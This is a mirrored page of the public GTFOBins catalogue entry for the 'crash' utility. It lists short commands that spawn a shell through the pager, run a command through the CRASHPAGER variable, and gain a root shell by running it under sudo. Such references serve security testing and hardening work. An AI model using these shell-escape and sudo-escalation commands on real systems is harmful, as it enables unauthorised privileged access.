This website requires JavaScript.
Explore
Help
Register
Sign In
mirror
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced
2026-01-08 16:31:34 +01:00
Code
Issues
9ec96219a3
GTFOBins.github.io
/
_gtfobins
/
crash.md
bcoles
bbb7db7d63
Create crash.md
2020-03-15 13:10:31 +01:00
475 B
Raw
Blame
History
functions
shell
command
sudo
description
code
This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
crash -h !sh
code
COMMAND='/usr/bin/id' CRASHPAGER="$COMMAND" crash -h
description
code
This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
sudo crash -h !sh